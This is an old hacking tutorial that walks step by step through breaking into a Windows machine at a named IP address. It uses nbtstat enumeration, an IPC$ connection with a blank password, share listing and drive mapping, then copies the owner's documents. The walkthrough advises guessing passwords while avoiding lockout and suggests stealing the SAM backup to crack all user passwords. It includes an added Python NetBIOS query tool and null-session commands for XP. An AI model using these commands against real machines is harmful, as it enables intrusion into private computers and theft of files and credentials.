Madirish Tutorial 09
C:\>nbtstat -A 215.25.200.152

Local Area Connection 2:
Node IpAddress: [0.0.0.0] Scope Id: []

    Host not found.

Local Area Connection:
Node IpAddress: [215.25.200.135] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    NCARTER        <00>  UNIQUE      Registered
    SVNET          <00>  GROUP       Registered
    NCARTER        <20>  UNIQUE      Registered
    SVNET          <1E>  GROUP       Registered
    NCARTER        <03>  UNIQUE      Registered
    NCARTER        <1F>  UNIQUE      Registered

    MAC Address = 00-00-E8-9A-9E-12

\Device\NetBT_Tcpip_{7CD42A51-8B2F-4A5F-A42E-1C76F336D3DE}:
Node IpAddress: [215.25.200.140] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    NCARTER        <00>  UNIQUE      Registered
    SVNET          <00>  GROUP       Registered
    NCARTER        <20>  UNIQUE      Registered
    SVNET          <1E>  GROUP       Registered
    NCARTER        <03>  UNIQUE      Registered
    NCARTER        <1F>  UNIQUE      Registered

    MAC Address = 00-00-E8-9A-9E-12
Using this command I have found that the machine's NetBIOS name is NCARTER and the workgroup is SVNET. Read the table by suffix: the <00> UNIQUE entry is the computer name, the <00> GROUP entry is the workgroup or domain, <20> means the file server service is running (so there are shares to look for), and <03> is the Messenger service. When a user is logged on, a second <03> UNIQUE entry carrying that user's name normally shows up; here the only <03> name is NCARTER itself, so that is the computer name, though on a home machine the owner's name is a good first guess for the account as well. Now the fun begins:
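As an added example (not part of the original tutorial), here is what nbtstat -A actually does on the wire: a NetBIOS node status query to UDP/137 (RFC 1002) and a parser for the reply. The reply it decodes below is constructed inline from the NCARTER table above; the suffix meanings are the standard Microsoft ones. The summarize() function reads the table the way the text describes, so a <03> name that differs from the computer name is reported as a logged-on user, and the <00> UNIQUE name is reported as the machine, not as a user.

```python
"""Build and parse the NetBIOS node status query behind 'nbtstat -A' (RFC 1002)."""
import socket
import struct

NBSTAT = 0x0021                    # RR type of a node status query/response
NETBIOS_NS_PORT = 137
WILDCARD = b"*" + b"\x00" * 15     # the '*' name that asks for the whole table

# Meaning of the common NetBIOS name suffixes (Microsoft KB 163409).
SUFFIXES = {
    (0x00, "UNIQUE"): "workstation service (computer name)",
    (0x00, "GROUP"): "workgroup or domain name",
    (0x03, "UNIQUE"): "messenger service (computer name, or a logged-on user name)",
    (0x1B, "UNIQUE"): "domain master browser",
    (0x1C, "GROUP"): "domain controllers",
    (0x1D, "UNIQUE"): "master browser",
    (0x1E, "GROUP"): "browser service elections",
    (0x1F, "UNIQUE"): "NetDDE service",
    (0x20, "UNIQUE"): "file server service (the machine offers shares)",
}


def encode_name(raw: bytes) -> bytes:
    """First-level encode a 16-byte NetBIOS name (RFC 1001 14.1): every byte becomes
    'A'+high nibble, 'A'+low nibble, wrapped as one 32-byte DNS-style label."""
    if len(raw) != 16:
        raise ValueError("NetBIOS names are exactly 16 bytes (15 chars + suffix)")
    label = bytearray()
    for b in raw:
        label += bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)])
    return bytes([len(label)]) + bytes(label) + b"\x00"


def build_node_status_request(txid: int) -> bytes:
    """The UDP payload nbtstat -A sends: a query for '*', type NBSTAT, class IN."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)   # flags 0 = plain query
    return header + encode_name(WILDCARD) + struct.pack(">HH", NBSTAT, 1)


def parse_node_status_response(data: bytes):
    """Return ([(name, suffix, 'UNIQUE'|'GROUP', active)], 'xx-xx-xx-xx-xx-xx')."""
    txid, flags, qd, an, ns, ar = struct.unpack_from(">HHHHHH", data, 0)
    if not flags & 0x8000 or an < 1:           # R bit clear, or nothing answered
        raise ValueError("not a response, or it carries no answer record")
    pos = 12
    while data[pos] != 0:                      # skip the echoed label-encoded name
        pos += 1 + data[pos]
    pos += 1
    rtype, rclass, ttl, rdlen = struct.unpack_from(">HHIH", data, pos)
    pos += 10
    if rtype != NBSTAT:
        raise ValueError(f"unexpected RR type {rtype:#06x}")
    num_names, pos = data[pos], pos + 1
    names = []
    for _ in range(num_names):                 # 18-byte NODE_NAME entries
        raw, suffix = data[pos:pos + 15], data[pos + 15]
        nflags, = struct.unpack_from(">H", data, pos + 16)
        pos += 18
        kind = "GROUP" if nflags & 0x8000 else "UNIQUE"   # G bit
        active = bool(nflags & 0x0400)                      # ACT bit
        names.append((raw.rstrip(b" \x00").decode("ascii", "replace"), suffix, kind, active))
    mac = data[pos:pos + 6]                    # statistics block starts with UNIT_ID
    return names, "-".join(f"{b:02X}" for b in mac)


def summarize(names):
    """<00> UNIQUE = machine, <00> GROUP = workgroup, <03> UNIQUE that is not the
    machine name = logged-on user, <20> UNIQUE = file server service running."""
    computer = next((n for n, s, k, _ in names if s == 0x00 and k == "UNIQUE"), None)
    workgroup = next((n for n, s, k, _ in names if s == 0x00 and k == "GROUP"), None)
    users = sorted({n for n, s, k, _ in names if s == 0x03 and k == "UNIQUE" and n != computer})
    sharing = any(s == 0x20 and k == "UNIQUE" for _, s, k, _ in names)
    return {"computer": computer, "workgroup": workgroup, "users": users, "file_sharing": sharing}


def build_node_status_response(txid: int, table, mac: bytes) -> bytes:
    """Encode a reply the way a NetBIOS host does; used here to exercise the parser offline."""
    rdata = bytes([len(table)])
    for name, suffix, kind in table:
        nflags = 0x0400 | (0x8000 if kind == "GROUP" else 0)   # ACT, plus G for groups
        rdata += name.ljust(15).encode("ascii") + bytes([suffix]) + struct.pack(">H", nflags)
    rdata += mac + b"\x00" * 40                # rest of the statistics block, not decoded
    header = struct.pack(">HHHHHH", txid, 0x8400, 0, 1, 0, 0)   # response, authoritative
    rr = encode_name(WILDCARD) + struct.pack(">HHIH", NBSTAT, 1, 0, len(rdata))
    return header + rr + rdata


def query_node_status(host: str, timeout: float = 2.0):
    """Live equivalent of 'nbtstat -A host' (UDP/137 must be reachable)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_node_status_request(0x1234), (host, NETBIOS_NS_PORT))
        data, _ = sock.recvfrom(4096)
    return parse_node_status_response(data)


# Constructed sample: the table the tutorial's nbtstat run printed for NCARTER.
SAMPLE_TABLE = [("NCARTER", 0x00, "UNIQUE"), ("SVNET", 0x00, "GROUP"),
                ("NCARTER", 0x20, "UNIQUE"), ("SVNET", 0x1E, "GROUP"),
                ("NCARTER", 0x03, "UNIQUE"), ("NCARTER", 0x1F, "UNIQUE")]
SAMPLE_MAC = bytes.fromhex("0000E89A9E12")

if __name__ == "__main__":
    table, mac = parse_node_status_response(
        build_node_status_response(0x1234, SAMPLE_TABLE, SAMPLE_MAC))
    for name, suffix, kind, active in table:
        meaning = SUFFIXES.get((suffix, kind), "unknown")
        print(f"{name:<15} <{suffix:02X}>  {kind:<6}  {'active' if active else 'inactive'}  {meaning}")
    print("MAC", mac, summarize(table))
```

Run it as-is to see the decoded sample table; call query_node_status("215.25.200.152") for the live equivalent of the command above. Note that the request has no authentication of any kind, which is why the name table is readable by anyone who can reach UDP/137.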
C:\>net use \\215.25.200.152\ipc$ /user:ncarter
Local name
Remote name       \\215.25.200.152\ipc$
Resource type     IPC
Status            OK
# Opens           0
# Connections     1
The command completed successfully.
OK, this is a bit simulated: usually you'll have to enter a password, but I got lucky here and there was no password in effect. If there had been a password you could issue

net use \\215.25.200.152\ipc$ PASSWORD /user:ncarter

where PASSWORD is your guess at their password (net use takes the password right after the share name, before the /user switch). Many systems will lock the account out after 3 bad attempts, but you'd be surprised how many won't; an account lockout policy is exactly what stops this kind of guessing, so check for one before you burn an account. What you're doing is connecting to IPC$, the inter-process communication share that every Windows machine running the server service exposes. Connecting to it with an empty user name and empty password ('net use \\215.25.200.152\ipc$ "" /user:""') is the classic null session; connecting as ncarter with a blank password, as here, is an ordinary authenticated session for an account that simply has no password.
C:\>net view \\215.25.200.152
Shared resources at \\215.25.200.152

Share name   Type    Used as   Comment
-------------------------------------------------------------------------------
HP COLOR     Print
MUSIC        Disk
PUBLIC       Disk
TOSEND       Disk
The command completed successfully.

OK, now we know the names of the shares on this computer. Let's try to connect to the 'TOSEND' share:
C:\>net use u: \\215.25.200.152\tosend
The password is invalid for \\215.25.200.152\tosend.

Type the password for \\215.25.200.152\tosend:
System error 5 has occurred.

Access is denied.
No dice, it's password protected. Let's try the others:
C:\>net use y: \\215.25.200.152\public The command completed successfully.
Bingo, we're in. Notice the y: in the 'net use' command? That's the local drive letter we're mapping to the PUBLIC share on NCARTER, so from here on it behaves like a local disk.
C:\>net view \\215.25.200.152
Shared resources at \\215.25.200.152

Share name   Type    Used as   Comment
-------------------------------------------------------------------------------
HP COLOR     Print
MUSIC        Disk
PUBLIC       Disk    Y:
TOSEND       Disk
The command completed successfully.

C:\>dir y:
 Volume in drive Y is HP_PAVILION
 Volume Serial Number is 1C68-0F0A

 Directory of Y:

04/26/2000  12:56p      <DIR>          .
04/26/2000  12:56p      <DIR>          ..
04/26/2000  11:57a                 331 Shortcut to Sawmill5.0.lnk
04/26/2000  12:58p              29,696 hits.doc
04/26/2000  01:33p             978,918 wtapi.pdf
04/26/2000  01:44p              19,456 USER TIMEOUT.doc
05/04/2000  02:34p              23,552 Letterhead.dot
11/15/2000  06:37p              20,480 Contact list.doc
07/24/2000  01:19p              87,040 Elegant Fax.doc
09/18/2000  12:38p           7,710,412 KingofPrussia000918.pdf
06/26/2000  04:28p      <DIR>          HP Drivers
09/18/2000  05:04p              15,906 cover.jpg
06/22/2000  12:33p      <DIR>          halflife update
06/02/2000  02:05p      <DIR>          School
09/06/2000  02:40p      <DIR>          abae
01/29/2000  05:33p      <DIR>          Content
04/27/2000  02:21p      <DIR>          photos
05/23/2000  01:22p      <DIR>          delete_button
03/01/2001  02:12p      <DIR>          Firewall Docs
06/20/2000  03:28p      <DIR>          Install
06/27/2000  10:26a      <DIR>          HomePage
07/12/2000  02:12p                 463 Team Fortress Classic Manual.lnk
09/18/2000  10:54a          16,864,741 wtetrial.exe
10/26/2000  04:39p      <DIR>          Visor programs
11/29/2000  03:39p              26,112 TCS VS letter.doc
              12 File(s)     25,777,107 bytes
              13 Dir(s)   5,406,457,856 bytes free

C:\>copy y:\hits.doc
        1 file(s) copied.

C:\>dir hits*
 Volume in drive C has no label.
 Volume Serial Number is 94B4-57C0

 Directory of C:\

04/26/2000  12:58p              29,696 hits.doc
               1 File(s)         29,696 bytes
               0 Dir(s)   2,796,068,864 bytes free
The rest of what I did should be pretty obvious: I copied hits.doc from the share to my local C: drive. Notice how easy all of this was? If you're really lucky you'll get an NT machine and be able to copy the SAM database file and crack it to get a list of all the users AND their passwords. One caveat there: the live SAM under %SystemRoot%\system32\config is held open by the system and can't be copied while NT is running, so what you would actually grab over a share is a backup copy such as the one in %SystemRoot%\repair, and only if a share exposes that directory at all. Enjoy.
-------------------------------------------------------------------------------------------
The tutorial, unfortunately, only covers Windows 98, Windows ME and Samba shares set up the same way, where a password (if any) belongs to the share itself. NT, 2000 and XP use user-level security instead: every connection is made as an account that belongs to a domain or to the machine itself, so to connect to an XP share you have to specify the domain (or the target machine's name) along with the username, for instance:

net use \\target.hostname.ext\ipc$ password /USER:username@fulldomain.ext

or, for a local account on a machine that is not in a domain, /USER:TARGETMACHINE\username. That will connect you to IPC$ on an XP machine as that account. A true null session, with no credentials at all, is

net use \\target.hostname.ext\ipc$ "" /USER:""

and whether XP accepts it depends on the RestrictAnonymous setting under HKLM\SYSTEM\CurrentControlSet\Control\Lsa. It's sort of a pain in the butt. To find the domain name on a Windows box you can either type

ipconfig /ALL

at the command line and read the Primary Dns Suffix line, or right-click 'My Computer', select 'Properties' and click the 'Network Identification' tab (called 'Computer Name' on XP).